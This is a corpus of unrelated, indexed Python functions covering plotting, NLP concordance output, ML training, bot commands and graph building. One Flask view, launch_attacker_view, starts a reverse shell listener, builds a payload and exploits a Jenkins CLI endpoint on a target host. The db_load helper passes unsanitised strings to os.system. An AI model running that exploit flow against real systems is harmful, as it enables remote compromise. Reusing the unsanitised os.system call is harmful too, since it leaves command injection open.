def plot_clustering(X, Y_hat, color=[1, 0, 0], mode='outer', show=False, savefn=''): """Plot boundaries produced by segmentation.""" # Initialize subplots fg, ax = plt.subplots(ncols=1, figsize=(10, 10)) # Plot prediction im = ax.imshow(mark_boundaries(X, Y_hat, color=color, mode=mode, background_label=0)) divider = make_axes_locatable(ax) cax = divider.append_axes("right", size="5%", pad=0.05) plt.colorbar(im, cax=cax) ax.get_xaxis().set_visible(False) ax.get_yaxis().set_visible(False) if show: # Pause to show figure plt.show() if savefn: # Save figure without padding fg.savefig(savefn, bbox_inches='tight', pad_inches=0.0)
5,348,643
def OrigPosLemConcordancer(sentences, annots, textMnt, wordType="word", nrows=10): """Output HTML for the text (including lemma and pos tags) identified by the AQAnnotation (typically a sentence annotation). Below the sentence (in successive rows) output the original terms, parts of speech, and lemma terms for the text identified by the AQAnnotation. Args: sentences: Sentence annotations that you would like to display. annots: The Dataframe of AQAnnotations that will contain the the AQAnnotations (orig, lemma, pos) for the above sentences textPath: Path for the str files. The sentence annotations must be for documents contained in these str files. wordType: The annotType that identies the AQAnnotation in the above annotations. nrows: Number of sentences to display Returns: HTML """ def _buildOrigPosLemmaRow(entryType, entry): return ("<tr>" + "<td>" + entryType + "</td>" + "<td bgcolor='grey'/>" + "<td bgcolor='grey'/>" + entry + "</tr>") sentenceAnnots = sentences.sort("docId","startOffset").limit(nrows).collect() tmpStr = "" docId = "" docText = "" text= "" lastDoc = "" curDoc = "" # Get the TextAnnotations (for the specified annotType) for each sentence for sentence in sentenceAnnots: textAnnots = annots.filter((col("docId") == sentence.docId) & (col("annotType") == wordType) & (col("startOffset") >= sentence.startOffset) & (col("endOffset") <= sentence.endOffset)) \ .sort("startOffset") \ .collect() # Get the raw text for the sentence annotation if docId != sentence.docId: docid = sentence.docId try: with io.open(textMnt + sentence.docId,'r',encoding='utf-8') as f: docText = f.read() except Exception as ex: print(ex) docText = "" if docText != "": text = docText[sentence.startOffset:sentence.endOffset] else: text = "" tmpStr += "<table border='1' style='font-family: monospace;table-layout: fixed;'><tr>" tmpStr += ("<td>" + sentence.docId + "</td>") tmpStr += ("<td>" + str(sentence.startOffset) + "</td>") tmpStr += ("<td>" + str(sentence.endOffset) + "</td>") tmpStr += ("<td colspan='" + str(len(textAnnots)) + "'>" + text + "</td>") tmpStr += "</tr>" # Get original row origEntry = "" for annot in textAnnots: if (annot.properties != None) and ('orig' in annot.properties) and (len(annot.properties['orig']) > 0): origEntry += ("<td>" + unquote_plus(annot.properties['orig']) + "</td>") else: origEntry += ("<td> </td>") tmpStr += _buildOrigPosLemmaRow('orig',origEntry) # Get pos row posEntry = "" for annot in textAnnots: if (annot.properties != None) and ('pos' in annot.properties) and (len(annot.properties['pos']) > 0): posEntry += ("<td>" + unquote_plus(annot.properties['pos']) + "</td>") else: posEntry += ("<td> </td>") tmpStr += _buildOrigPosLemmaRow('pos',posEntry) # Get lemma row lemmaEntry = "" for annot in textAnnots: if (annot.properties != None) and ('lemma' in annot.properties) and (len(annot.properties['lemma']) > 0): lemmaEntry += ("<td>" + unquote_plus(annot.properties['lemma']) + "</td>") else: lemmaEntry += ("<td> </td>") tmpStr += _buildOrigPosLemmaRow('lemma',lemmaEntry) tmpStr += "</table><p/><p/><p/>" return "<html><body>" + tmpStr + "</body></html>"
5,348,644
def get_args(**kwargs): """Generate cli args Arguments: kwargs[dict]: Pair value in which key is the arg and value a tuple with the help message and default value Returns: Namespace: Args namespace object """ parser = argparse.ArgumentParser() for key, (help, default) in kwargs.items(): parser.add_argument("--{}".format(key), help=help, default=default) return parser.parse_args()
5,348,645
def dispfps(handler, n=100): """Average iterations per second over last n iterations. Args: handler (generator): Generator that yields data. n (int, optional): Number of iterations to average over. Defaults to 100. Yields: pyobj: Forwards data from handler """ times = deque() for data in handler: end = time.time() times.append(end) if len(times) > n: diff = end - times.popleft() print(f"\rFPS: {(n / diff):.3f}", end="") yield data
5,348,646
def show_hidden_article(request, id): """ 展示隐藏的文章 """ db = connect_mongodb_database(request) article = db.articles.find_one({ 'Id':int(id), 'IsPublic': False }) if article is None: return HttpResponse(404) return render_admin_and_back(request, 'show-hidden-article.html', { 'page': u'隐私文章 - '+ article['Title'], 'article': article, })
5,348,647
def MakeNormalPmf(mu, sigma, num_sigmas, n=201): """Makes a PMF discrete approx to a Normal distribution. mu: float mean sigma: float standard deviation num_sigmas: how many sigmas to extend in each direction n: number of values in the Pmf returns: normalized Pmf """ pmf = Pmf() low = mu - num_sigmas * sigma high = mu + num_sigmas * sigma for x in np.linspace(low, high, n): p = EvalNormalPdf(x, mu, sigma) pmf.Set(x, p) pmf.Normalize() return pmf
5,348,648
def _val_from_env(env, attr): """Transforms env-strings to python.""" val = os.environ[env] if attr == 'rules': val = _rules_from_env(val) elif attr == 'wait_command': val = int(val) elif attr in ('require_confirmation', 'no_colors'): val = val.lower() == 'true' return val
5,348,649
def histogram(a, bins, ranges): """ Examples -------- >>> x = np.random.uniform(0., 1., 100) >>> H, xedges = np.histogram(x, bins=5, range=[0., 1.]) >>> Hn = histogram(x, bins=5, ranges=[0., 1.]) >>> assert np.all(H == Hn) """ hist_arr = np.zeros((bins,), dtype=a.dtype) return _hist1d_numba_seq(hist_arr, a, bins, np.asarray(ranges))
5,348,650
def testfile(path, shell='/bin/sh', indent=2, env=None, cleanenv=True, debug=False, testname=None): """Run test at path and return input, output, and diff. This returns a 3-tuple containing the following: (list of lines in test, same list with actual output, diff) diff is a generator that yields the diff between the two lists. If a test exits with return code 80, the actual output is set to None and diff is set to []. Note that the TESTDIR, TESTFILE, and TESTSHELL environment variables are available to use in the test. :param path: Path to test file :type path: bytes or str :param shell: Shell to run test in :type shell: bytes or str or list[bytes] or list[str] :param indent: Amount of indentation to use for shell commands :type indent: int :param env: Optional environment variables for the test shell :type env: dict or None :param cleanenv: Whether or not to sanitize the environment :type cleanenv: bool :param debug: Whether or not to run in debug mode (don't capture stdout) :type debug: bool :param testname: Optional test file name (used in diff output) :type testname: bytes or None :return: Input, output, and diff iterables :rtype: (list[bytes], list[bytes], collections.Iterable[bytes]) """ f = open(path, 'rb') try: abspath = os.path.abspath(path) env = env or os.environ.copy() env['TESTDIR'] = envencode(os.path.dirname(abspath)) env['TESTFILE'] = envencode(os.path.basename(abspath)) if testname is None: # pragma: nocover testname = os.path.basename(abspath) return test(f, shell, indent=indent, testname=testname, env=env, cleanenv=cleanenv, debug=debug) finally: f.close()
5,348,651
def is_valid_python_code(src_string: str): """True if, and only if, ``src_string`` is valid python. Valid python is defined as 'ast.parse(src_string)` doesn't raise a ``SyntaxError``' """ try: ast_parse(src_string) return True except SyntaxError: return False
5,348,652
def rss_format_export_post(): """ :return: """ try: payload = request.get_json(force=True) # post data in json except: payload = dict(request.form) # post data in form encoding if 'link' in payload: link = read_value_list_or_not(payload, 'link') else: link = '' results, status = export_post(request, 'RSS') if status == 200: return return_rss_format_export(solr_data=results, link=link) return return_response(results, status)
5,348,653
def send_file(app, name, content_type, file_like, node, user): """Upload file to OSF.""" file_like.seek(0) with app.test_request_context(): upload_url = storage_utils.get_waterbutler_upload_url( user, node, path=name, ) requests.put( upload_url, data=file_like, headers={'Content-Type': content_type}, )
5,348,654
def on_command(name: Union[str, CommandName_T], *, logger: Logger, checkfunc: Callable[[CommandSession], bool] = None, wait_for: Callable[[], bool] = None, cooldown: int = 0, use_default_infolog: bool = True, aliases: Union[Iterable[str], str] = (), permission: int = nonebot.permission.EVERYBODY, only_to_me: bool = True, privileged: bool = False, shell_like: bool = False, **kwargs) -> Callable: """on_command装饰器。被装饰的函数应当接受两个参数session及bot。 参数: name:命令名称。 logger:日志器。 checkfunc:检查是否应该工作的函数。函数执行返回True则执行功能,否则退出。 wait_for: 等待函数。函数执行返回为True后再执行功能,否则等待1秒直到返回为True。 cooldown:命令运行后的冷却时间。冷却时间内无法再次运行。 use_default_infolog:是否使用默认info级别的日志记录。 aliases:命令别名。 permission:命令所需权限。 only_to_me:是否仅响应私聊或者at机器人的指令。 privileged:是否允许复数次执行。 shell_like:是否是类shell指令。 """ def deco(func) -> Callable: @wraps(func) async def wrapper(session: CommandSession): if session.event['user_id'] in BLACKLIST['user']: return if session.event['message_type'] == 'group' and session.event['group_id'] in BLACKLIST['group']: return if checkfunc is not None: if not ((await checkfunc(session) if asyncio.iscoroutinefunction(checkfunc) else checkfunc(session))): return if wait_for is not None: count = 0 while not ((await wait_for()) if asyncio.iscoroutinefunction(wait_for) else wait_for()): await asyncio.sleep(1) count += 1 if count >= _wait_for_maxtime: raise WaitForTimeoutError funcname = func.__module__ + '.' + func.__name__ if funcname in _cooldown_functions[session.self_id].keys(): return try: await func(session, bot) if use_default_infolog: if session.event['message_type'] == 'group': logger.info(f'<Command> Group {session.event["group_id"]} user {session.event["user_id"]} call {funcname} successfully') else: logger.info(f'<Command> Private user {session.event["user_id"]} call {funcname} successfully') except (_PauseException, _FinishException, SwitchException) as e: raise e except Warning as w: logger.warning(f'<Command> Warning {type(w)} occured while {funcname} is running.') except (ApiNotAvailable, RetryExhaustedError) as a: logger.error(f'<Command> Error {type(a)} occured while {funcname} is running.') except ActionFailed as a: logger.error(f'<Command> Error {type(a)} occured while {funcname} is running, retcode = {a.retcode}.') except Exception as e: logger.exception(f'<Command> Error {type(e)} occured while {funcname} is running.') if cooldown > 0: if funcname not in _cooldown_functions[session.self_id]: _cooldown_functions[session.self_id][funcname] = cooldown return nonebot.on_command( name, aliases=aliases, permission=permission, only_to_me=only_to_me, privileged=privileged, shell_like=shell_like, )(debuglog(logger)(wrapper)) return deco
5,348,655
def fillOrders(barberId, start, end, step=1): """ Создаёт заказы для барбера с iD = barberId :param: barberId: id барбера :type: int :param start: время начало работы :type: datetime.datetime :param end: время конца работы :type: datetime.datetime :param step: время с которым будет ставить заказы, в часах :type: datetime.datetime :return: """ delta_t = datetime.timedelta(hours=step) ordered_time = start while ordered_time < end: insertOrder(ordered_time, barberId=barberId) ordered_time += delta_t
5,348,656
async def urlcheck( api: vq.API, event: vq.Event(), sender: vq.Sender() ): """ Update data for user """ link = re.fullmatch( config.LINK_PATTERN, event.object.message.text ) if event.object.message.peer_id > vq.PEER: if not re.fullmatch( config.LINK_PATTERN, event.object.message.text ) and not ( "action" in event.object.message and event.object.message.action.type in ( "chat_invite_user", "chat_invite_user_by_link" ) ): await api.messages.send( peer_id=event.object.message.peer_id, message=config.INVALID_LINK, random_id=0 ) await api.messages.remove_chat_user( chat_id=event.object.message.peer_id - vq.PEER, user_id=sender.id )
5,348,657
def SetUp(filename, rel_path=RELATIVE_TEST_PATH): """ SetUp returns a parsed C Program.""" if not os.path.exists(PICKLE_FILE): KVStore.CreateNewStore(PICKLE_FILE, redhawk.GetVersion()) return G.GetLanguageSpecificTree(os.path.join(rel_path, filename), PICKLE_FILE, language='c')
5,348,658
def setup_agents(model, initial_locations): """Load the simulated initial locations and return a list that holds all agents. """ initial_locations = initial_locations.reshape(2, model["n_types"], 30000) agents = [] for typ in range(model["n_types"]): for i in range(model["n_agents_by_type"][typ]): agents.append( Agent( typ=typ, initial_location=initial_locations[typ, :, i], n_neighbours=model["n_neighbours"], require_same_type=model["require_same_type"], max_moves=model["max_moves"], ) ) return agents
5,348,659
def properties_to_csv(prop_dict : dict, csv_filename : str, epoch_key : str, append : bool=True) -> None: """ Writes a CSV summarizing how training is going by comparing the properties of the generated structures during evaluation to the training set. Also writes the properties to an active tensorboard. Args: ---- prop_dict (dict) : Contains molecular properties. csv_filename (str) : Full path/filename to CSV file. epoch_key (str) : For example, "Training set" or "Epoch {n}". append (bool) : Indicates whether to append to the output file (if the file exists) or start a new one. Default `True`. """ # get all the relevant properties from the dictionary frac_valid = prop_dict[(epoch_key, "fraction_valid")] avg_n_nodes = prop_dict[(epoch_key, "avg_n_nodes")] avg_n_edges = prop_dict[(epoch_key, "avg_n_edges")] frac_unique = prop_dict[(epoch_key, "fraction_unique")] # use the following properties if they exist try: run_time = prop_dict[(epoch_key, "run_time")] frac_valid_pt = round( float(prop_dict[(epoch_key, "fraction_valid_properly_terminated")]), 5 ) frac_pt = round( float(prop_dict[(epoch_key, "fraction_properly_terminated")]), 5 ) except KeyError: run_time = "NA" frac_valid_pt = "NA" frac_pt = "NA" (norm_n_nodes_hist, norm_atom_type_hist, norm_formal_charge_hist, norm_numh_hist, norm_n_edges_hist, norm_edge_feature_hist, norm_chirality_hist) = normalize_evaluation_metrics(prop_dict, epoch_key) if not append: # file does not exist yet, create it with open(csv_filename, "w") as output_file: # write the file header output_file.write( "set, fraction_valid, fraction_valid_pt, fraction_pt, run_time, " "avg_n_nodes, avg_n_edges, fraction_unique, atom_type_hist, " "formal_charge_hist, numh_hist, chirality_hist, " "n_nodes_hist, n_edges_hist, edge_feature_hist\n" ) # append the properties of interest to the CSV file with open(csv_filename, "a") as output_file: output_file.write( f"{epoch_key}, {frac_valid:.3f}, {frac_valid_pt}, {frac_pt}, {run_time}, " f"{avg_n_nodes:.3f}, {avg_n_edges:.3f}, {frac_unique:.3f}, " f"{norm_atom_type_hist}, {norm_formal_charge_hist}, " f"{norm_numh_hist}, {norm_chirality_hist}, {norm_n_nodes_hist}, " f"{norm_n_edges_hist}, {norm_edge_feature_hist}\n" ) # write to tensorboard try: epoch = int(epoch_key.split()[1]) except: pass else: # scalars tb_writer.add_scalar("Evaluation/fraction_valid", frac_valid, epoch) tb_writer.add_scalar("Evaluation/fraction_valid_and_properly_term", frac_valid_pt, epoch) tb_writer.add_scalar("Evaluation/fraction_properly_terminated", frac_pt, epoch) tb_writer.add_scalar("Evaluation/avg_n_nodes", avg_n_nodes, epoch) tb_writer.add_scalar("Evaluation/fraction_unique", frac_unique, epoch)
5,348,660
async def get_active_infraction( ctx: Context, user: MemberOrUser, infr_type: str, send_msg: bool = True ) -> t.Optional[dict]: """ Retrieves an active infraction of the given type for the user. If `send_msg` is True and the user has an active infraction matching the `infr_type` parameter, then a message for the moderator will be sent to the context channel letting them know. Otherwise, no message will be sent. """ log.trace(f"Checking if {user} has active infractions of type {infr_type}.") active_infractions = await ctx.bot.api_client.get( 'bot/infractions', params={ 'active': 'true', 'type': infr_type, 'user__id': str(user.id) } ) if active_infractions: # Checks to see if the moderator should be told there is an active infraction if send_msg: log.trace(f"{user} has active infractions of type {infr_type}.") await send_active_infraction_message(ctx, active_infractions[0]) return active_infractions[0] else: log.trace(f"{user} does not have active infractions of type {infr_type}.")
5,348,661
def __compute_optical_function_vs_s(transporter, particles, optical_function_name): # todo Adjust """ Compute values of optical function vs s for one particle, which coordinates are x_min, theta_x_min, ... or x_mean - delta_x, ... :param transporter: transport function :param particles: BunchConfiguration object :param optical_function_name: String, name of optical function, as specified in matrix_indexes :return: matrix with rows: s and optical function """ particles = transporter(particles) result = np.append(particles["end"].T[tmi.ptc_twiss[Parameters.S]].reshape((-1, 1)), particles["end"].T[tmi.ptc_twiss[optical_function_name]].reshape((-1, 1)), axis=1) return result
5,348,662
def plot_arb_images(label, data, label_string): """ Neatly displays arbitrary numbers of images from the camera returns fig Parameters: ----------- label: array of values that each image is labeled by, e.g. time data: array of arrays of image data label_string: string describing label, e.g. 's' """ length = len(data) columns = 10 if length % columns is not 0: rows = length / columns + 1 else: rows = length / columns fig = _p.figure() fig.set_figheight(rows * 5) fig.set_figwidth(10) for i in range(length): ax = fig.add_subplot(rows, columns, i + 1) ax.matshow(data[i], vmin=_n.min(data), vmax=_n.max(data)) ax.set_title('%s\n%.1f%s' % (i, label[i], label_string)) if i % 10 is 0: ax.set_xticks([]) ax.set_ylabel('pixels') else: ax.set_xticks([]) ax.set_yticks([]) fig.tight_layout() return fig
5,348,663
def listGslbServer(**kargs): """ List the Servers of KT Cloud GSLB. * Args: - zone(String, Required) : [KR-CA, KR-CB, KR-M, KR-M2] * Examples: print(gslb.listGslbServer(zone='KR-M')) """ my_apikey, my_secretkey = c.read_config() if not 'zone' in kargs: return c.printZoneHelp() ZoneName = kargs['zone'] del kargs['zone'] kargs['zoneid'] = c.getzoneidbyhname(ZoneName) M2Bool = c.IsM2(ZoneName) baseurl = c.geturl(ctype='gslb', m2=M2Bool) kargs['command'] = 'listGslbServer' kargs['response'] = 'json' kargs['apikey'] = my_apikey return c.makerequest(kargs, baseurl, my_secretkey)
5,348,664
def imencode(image, pix_fmt=IM_RGB, quality=DEFAULT_QUALITY): """ Encode image into jpeg codec Adapt convert image pixel color with pix_fmt Parameters ---------- image: source pix_fmt: format of pixel color. Default: RGB quality: JPEG quality image. Returns ------- Buffer of image encoded """ check_type("image", image, numpy.ndarray) if pix_fmt == IM_RGB: image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) _, buf = cv2.imencode('.jpeg', image, params=[cv2.IMWRITE_JPEG_QUALITY, int(quality)]) return buf
5,348,665
def db_load(infile, outfile, db_type): """ Calls the linux db_load command to load up the database files The command is: db_load -c duplicates=1, -f infile -T -t [ btree | hash | queue | recno ] outfile """ assert db_type is "btree" or db_type is "hash" or \ db_type is "queue" or db_type is "recno" # command = ["db_load", "-c", "duplicates=1", "-f", infile, # "-T", "-t", db_type, outfile] # subprocess.run(command) if os.path.exists(outfile): os.remove(outfile) os.system("db_load -c duplicates=1 -f " + infile + " -T -t " + db_type + " " + outfile)
5,348,666
def split_train_test_data(X, Y, train_rate): """ 将数据集划分为训练集与测试集 :param X: 数据集的特征 :param Y: 数据集的标签 :param train_rate: 训练集的比例 :return: 训练集的特征;训练集的标签;测试集的特征;测试集的标签 """ number = len(X) number_train = int(number * train_rate) number_test = number - number_train train_X = [] train_Y = [] test_X = [] test_Y = [] for i in range(number): if number_test > 0: if number_train == 0 or np.random.randint(2) == 0: number_test -= 1 test_X.append(X[i]) test_Y.append(Y[i]) else: number_train -= 1 train_X.append(X[i]) train_Y.append(Y[i]) else: number_train -= 1 train_X.append(X[i]) train_Y.append(Y[i]) return np.array(train_X), np.array(train_Y), np.array(test_X), np.array(test_Y)
5,348,667
def nonsingular_concat(X, vector): """Appends vector to matrix X iff the resulting matrix is nonsingular. Args: X (np.array): NxM Matrix to be appended to vector (np.array): Nx1 vector to be appended to X Returns: new_X (np.array): Nx(M+1) Matrix or None """ # Cast vector to matrix vector = np.atleast_2d(vector) # Append vector as new row at bottom of matrix new_X = np.concatenate((X, vector), axis=0) # Check if matrix is still non-singular if new_X.shape[0] == np.linalg.matrix_rank(new_X): return new_X else: return None
5,348,668
def get_oxidation_state(element: Union[str, Element]) -> int: """Get a typical oxidation state If it doesn't exist in the database, 0 is returned. Args: element (str/ Element): Input element Return: Oxidation state of the element. """ try: return oxidation_state_dict[str(element)] except KeyError: logger.warning(f"Oxidation state: {element} is unavailable. Set 0.") return 0
5,348,669
def __quality_indexes( graph: nx.Graph, communities: object, scoring_function: Callable[[object, object], float], summary: bool = True, ) -> object: """ :param graph: NetworkX/igraph graph :param communities: NodeClustering object :param summary: boolean. If **True** it is returned an aggregated score for the partition is returned, otherwise individual-communitys ones. Default **True**. :return: If **summary==True** a FitnessResult object, otherwise a list of floats. """ graph = convert_graph_formats(graph, nx.Graph) values = [] for com in communities.communities: community = nx.subgraph(graph, com) values.append(scoring_function(graph, community)) if summary: return FitnessResult( min=min(values), max=max(values), score=np.mean(values), std=np.std(values) ) return values
5,348,670
def test_non_positive_integer_max_exclusive003_1571_non_positive_integer_max_exclusive003_1571_v(mode, save_output, output_format): """ TEST :Facet Schemas for string : facet=maxExclusive and value=-1 and document value=-5 """ assert_bindings( schema="msData/datatypes/Facets/nonPositiveInteger/nonPositiveInteger_maxExclusive003.xsd", instance="msData/datatypes/Facets/nonPositiveInteger/nonPositiveInteger_maxExclusive003.xml", class_name="Test", version="1.1", mode=mode, save_output=save_output, output_format=output_format, structure_style="filenames", )
5,348,671
def serve_scripts(scripts): """ Combines one or more script files into one and embeds them in the small autoCSP JavaScript framework. """ debug = DEBUG and not LOCKED_MODE views_path = os.path.expanduser(PATHS['VIEWS']) with open(views_path + 'static/sha256.js', 'r') as f: sha256js = f.read() template = lib.webinterface.render_template('framework.js', debug=debug, scripts=scripts, sha256js=sha256js) return wrap_static(template, '.js')
5,348,672
def readFromDB_DSC_authorityKey(authorityKey: bytes, connection: Connection) -> DocumentSignerCertificate: """Reading from database""" try: logger.info("Reading DSC object from database with authority key.") return connection.getSession().query(DocumentSignerCertificateStorage).filter(DocumentSignerCertificateStorage.authorityKey == authorityKey).all() except Exception: raise DocumentSignerCertificateStorageError("Problem with writing the object")
5,348,673
def history_report(history, config=None, html=True): """ Test a model and save a history report. Parameters ---------- history : memote.HistoryManager The manager grants access to previous results. config : dict, optional The final test report configuration. html : bool, optional Whether to render the report as full HTML or JSON (default True). """ if config is None: config = ReportConfiguration.load() report = HistoryReport(history=history, configuration=config) if html: return report.render_html() else: return report.render_json()
5,348,674
def matrix_reduce(): """ reduce :return: """ isses = tf.InteractiveSession() # 对角值 X = tf.constant([[1, 2, 3, 4], [2, 3, 4, 5], [3, 4, 5, 6]]) logger.info("X\n%s" % X.eval()) logger.info("tf.reduce_sum(X)\n {0}".format(tf.reduce_sum(X).eval())) logger.info("tf.reduce_sum(X,axis=0)\n {0}".format(tf.reduce_sum(X, axis=0).eval())) logger.info("tf.reduce_sum(X,axis=1)\n {0}".format(tf.reduce_sum(X, axis=1).eval())) logger.info("tf.reduce_mean(X)\n {0}".format(tf.reduce_mean(X).eval())) logger.info("tf.reduce_mean(X,axis=0)\n {0}".format(tf.reduce_mean(X, axis=0).eval())) logger.info("tf.reduce_mean(X,axis=1)\n {0}".format(tf.reduce_mean(X, axis=1).eval())) logger.info("tf.reduce_max(X)\n {0}".format(tf.reduce_max(X).eval())) logger.info("tf.reduce_max(X,axis=0)\n {0}".format(tf.reduce_max(X, axis=0).eval())) logger.info("tf.reduce_max(X,axis=1)\n {0}".format(tf.reduce_max(X, axis=1).eval())) logger.info("tf.reduce_min(X)\n {0}".format(tf.reduce_min(X).eval())) logger.info("tf.reduce_min(X,axis=0)\n {0}".format(tf.reduce_min(X, axis=0).eval())) logger.info("tf.reduce_min(X,axis=1)\n {0}".format(tf.reduce_min(X, axis=1).eval())) isses.close()
5,348,675
def derive_from_dem(dem): """derive slope and flow direction from a DEM. Results are returned in a dictionary that contains references to ArcPy Raster objects stored in the "in_memory" (temporary) workspace """ # set the snap raster for subsequent operations env.snapRaster = dem # calculate flow direction for the whole DEM flowdir = FlowDirection(in_surface_raster=dem, force_flow="NORMAL") flow_direction_raster = so("flowdir","random","in_memory") flowdir.save(flow_direction_raster) # calculate slope for the whole DEM slope = Slope(in_raster=dem, output_measurement="PERCENT_RISE", method="PLANAR") slope_raster = so("slope","random","in_memory") slope.save(slope_raster) return { "flow_direction_raster": Raster(flow_direction_raster), "slope_raster": Raster(slope_raster), }
5,348,676
def from_error_details(error: str, message: str, stacktrace: Optional[str]) -> BidiException: """Create specific WebDriver BiDi exception class from error details. Defaults to ``UnknownErrorException`` if `error` is unknown. """ cls = get(error) return cls(error, message, stacktrace)
5,348,677
def tangential_proj(u, n): """ See for instance: https://link.springer.com/content/pdf/10.1023/A:1022235512626.pdf """ return (ufl.Identity(u.ufl_shape[0]) - ufl.outer(n, n)) * u
5,348,678
def test_no_env(argv, expected): """Test outside of any supported CI env. :param iter argv: Mock sys.argv. :param dict expected: Expected return value of get_arguments(). """ environ = dict(PATH='.') actual = get_arguments(['download'] + argv, environ) assert actual == expected
5,348,679
def _RemoveEdges(tris, match): """tris is list of triangles. er is as returned from _MaxMatch or _GreedyMatch. Return list of (A,D,B,C) resulting from deleting edge (A,B) causing a merge of two triangles; append to that list the remaining unmatched triangles.""" ans = [] triset = set(tris) while len(match) > 0: (_, e, tl, tr) = match.pop() (a, b) = e if tl in triset: triset.remove(tl) if tr in triset: triset.remove(tr) c = _OtherVert(tl, a, b) d = _OtherVert(tr, a, b) if c is None or d is None: continue ans.append((a, d, b, c)) return ans + list(triset)
5,348,680
def viewdata(data): """Prints out readable information of the output of getSearchData""" print('_' * 50) print('Number of Results: ' + str(data[0]['numResults'])) print('\nSearchURL: ' + data[0]['searchURL']) print('_' * 50) i = 1 for m in data[1]: print(str(i) + '. ') for n in m: print(str(n) + ': ' + str(m[n])) i += 1 print('\n')
5,348,681
def cli(): """Extinct Gaming CLI Tools"""
5,348,682
def get_course_authoring_url(course_locator): """ Gets course authoring microfrontend URL """ return configuration_helpers.get_value_for_org( course_locator.org, 'COURSE_AUTHORING_MICROFRONTEND_URL', settings.COURSE_AUTHORING_MICROFRONTEND_URL )
5,348,683
def sumDwellStateSub(params): """Threaded, sums dwell times with 1 day seeing no change & accounting for fractional days""" (dfIn,dwellTime,weight) = params dfOut = dfIn.copy(deep=True) while dwellTime > 1: if dwellTime > 2: increment = 1 else: increment = dwellTime-1 dfOut += dfShift(dfIn,1) * increment dwellTime += -1 return dfOut * weight
5,348,684
def launch_attacker_view(): """ Accepts a JSON payload with the following structure: { "target": "nlb-something.fqdn.com", "attacker": "1.2.3.4" } If the payload parses correctly, then launch a reverse shell listener using pexpect.spawn then spawn the auto-sploit.sh tool and enter the target and attacker info again using pexpect :return: Simple String response for now """ managed_instances = get_managed_instances() if request.method == 'GET': return render_template('routing/attacker_view.html', log_group=log_group, attacker_ip=attacker_ip, managed_instances=managed_instances, gd_events_of_interest=gd_events_of_interest, target_ip=target_ip) if request.method == 'POST': logger.info('Attacker is {} and Victim is {}'.format(attacker_ip, target_ip)) print('Attacker is {} and Victim is {}'.format(attacker_ip, target_ip)) if target_ip == "" or attacker_ip == "": logger.info('Incorrect Json format!') print(request.payload) res = make_response(jsonify( { "result": "error", "message": "ERROR - Incorrect Json format" }), 200) res.headers['Content-type'] = 'application/json' return res # Run auto_sploit.sh _launch_listener() logger.info('launching listener process') # # Create the payload from the attacker source ip input create_payload() # Run the exploit jenkins_cli_url = 'http://' + target_ip + ':80/cli' # # Get an initial session id with download session = exploit_get_sessionid(jenkins_cli_url) # if session: # Try and upload payload if upload_chunked(jenkins_cli_url, session, "asdf"): logger.info('Exploit_launched_ok') res = make_response(jsonify( { "result": "success", "message": "SUCCESS - auto-sploit launched!" }), 200) res.headers['Content-type'] = 'application/json' return res else: logger.info('Failed to launch exploit') res = make_response(jsonify( { "result": "error", "message": "ERROR - Unable to run exploit" }), 200) res.headers['Content-type'] = 'application/json' return res
5,348,685
def stretch(alignment, factor): """Time-stretch the alignment by a constant factor""" # Get phoneme durations durations = [factor * p.duration() for p in alignment.phonemes()] alignment = copy.deepcopy(alignment) alignment.update(durations=durations) return alignment
5,348,686
def train(epoch, train_loader, model, contrast, criterion_l, criterion_ab, optimizer, opt): """ one epoch training """ model.train() contrast.train() batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter() l_loss_meter = AverageMeter() ab_loss_meter = AverageMeter() l_prob_meter = AverageMeter() ab_prob_meter = AverageMeter() end = time.time() for idx, (inputs, index) in enumerate(train_loader): data_time.update(time.time() - end) # l, ab = inputs['rgb'], inputs['rgb'] l, ab = inputs['rgb'], inputs['dep'] label = inputs['label'] bsz = l.size(0) l = l.float() ab = ab.float() if torch.cuda.is_available(): index = index.cuda() l = l.cuda() ab = ab.cuda() # ===================forward===================== feat_l, feat_ab = model(l, ab) # [bs, 128] # print (feat_l.size()) # print (feat_ab.size()) out_l, out_ab = contrast(feat_l, feat_ab, index) l_loss = criterion_l(out_l) ab_loss = criterion_ab(out_ab) l_prob = out_l[:, 0].mean() ab_prob = out_ab[:, 0].mean() loss = l_loss + ab_loss # ===================backward===================== optimizer.zero_grad() if opt.amp: with amp.scale_loss(loss, optimizer) as scaled_loss: scaled_loss.backward() else: loss.backward() # torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1e-4, norm_type=2.0) optimizer.step() # ===================meters===================== losses.update(loss.item(), bsz) l_loss_meter.update(l_loss.item(), bsz) l_prob_meter.update(l_prob.item(), bsz) ab_loss_meter.update(ab_loss.item(), bsz) ab_prob_meter.update(ab_prob.item(), bsz) torch.cuda.synchronize() batch_time.update(time.time() - end) end = time.time() # print info if (idx + 1) % opt.print_freq == 0: print('Train: [{0}][{1}/{2}]\t' # 'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\t' # 'DT {data_time.val:.3f} ({data_time.avg:.3f})\t' 'loss {loss.val:.3f} ({loss.avg:.3f})\t' 'l_p {lprobs.val:.3f} ({lprobs.avg:.3f})\t' 'ab_p {abprobs.val:.3f} ({abprobs.avg:.3f})'.format( epoch, idx + 1, len(train_loader), batch_time=batch_time, data_time=data_time, loss=losses, lprobs=l_prob_meter, abprobs=ab_prob_meter)) # print(out_l.shape) sys.stdout.flush() return l_loss_meter.avg, l_prob_meter.avg, ab_loss_meter.avg, ab_prob_meter.avg
5,348,687
def create_issue_digraph(epics_stories): """Return a graph representation of all issues. Blocking dependencies are modelled as graph edges. """ log.info('creating graph...') graph = nx.DiGraph() for epic, stories in epics_stories.items(): for issue in stories: graph.add_node(issue.id, issue=issue, epic=epic) for issue in itertools.chain(*epics_stories.values()): for target_issue_id in get_blocked_keys(issue): if target_issue_id not in graph.nodes: log.warning( f'issue {issue.key} blocks unknown issue {target_issue_id}') continue graph.add_edge(issue.id, target_issue_id) if not nx.is_directed_acyclic_graph(graph): log.error('graph has at least one cycle: {}'. format(nx.find_cycle(graph))) sys.exit(1) return graph
5,348,688
